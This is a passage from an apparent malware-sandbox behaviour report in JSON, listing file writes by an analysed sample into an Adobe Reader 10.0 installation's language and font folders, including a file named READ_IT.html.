10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10450", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10459", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10468", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10477", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10486", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10518", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10521", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10558", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10595", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10628", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10658", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10673", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10688", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10705", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10720", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10735", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10750", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10765", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10776", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10787", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10798", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10809", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10844", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10883", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10922", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10957", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10974", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": 